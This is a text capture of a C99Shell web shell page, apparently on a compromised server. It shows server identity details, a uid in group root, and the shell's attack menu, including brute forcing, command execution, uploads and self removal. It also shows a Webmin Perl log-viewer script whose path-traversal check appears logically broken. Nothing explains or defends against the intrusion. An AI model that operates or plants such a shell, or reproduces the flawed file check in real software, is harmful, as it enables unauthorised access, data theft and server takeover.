!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.64 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     view_log.cgi (1.35 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Display the webalizer report for some domain

require './virtual-server-lib.pl';
&require_webalizer();
&ReadParse();

$ENV{'PATH_INFO'} =~ /^\/([^\/]+)(\/.*)$/ ||
    &error($webalizer::text{'view_epath'});
$did = $1;
$file = $2;
$d = &get_domain($did);
$log = &get_website_log($d);
$file =~ /\.\./ || $file =~ /\<|\>|\||\0/ &&
    &error($webalizer::text{'view_efile'});

$lconf = &webalizer::get_log_config($log) ||
    &error($webalizer::text{'view_elog'}." : $log");
$full = "$lconf->{'dir'}$file";
open(FILE, "<".$full) || &error($webalizer::text{'view_eopen'}." : $full");

# Display file contents
if ($full =~ /\.(html|htm)$/i) {
    while(read(FILE, $buf, 1024)) {
        $data .= $buf;
        }
    close(FILE);
    $data =~ /<TITLE>(.*)<\/TITLE>/i;
    $title = $1;
    $data =~ s/^[\000-\377]*<BODY.*>//i;
    $data =~ s/<\/BODY>[\000-\377]*$//i;

    &ui_print_header(undef, $title || $text{'view_title'}, "");
    print $data;
    &ui_print_footer("/$module_name/edit_domain.cgi?dom=$d->{'id'}",
             $text{'edit_return'},
             "/$module_name/", $text{'index_return'});
    }
else {
    print "Content-type: ",$full =~ /\.png$/i ? "image/png" :
                   $full =~ /\.gif$/i ? "image/gif" :
                   $full =~ /\.(jpg|jpeg)$/i ? "image/jpeg" :
                   $full =~ /\.(html|htm)$/i ? "text/html" :
                               "text/plain","\n";
    print "\n";
    while(read(FILE, $buf, 1024)) {
        print $buf;
        }
    close(FILE);
    }


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--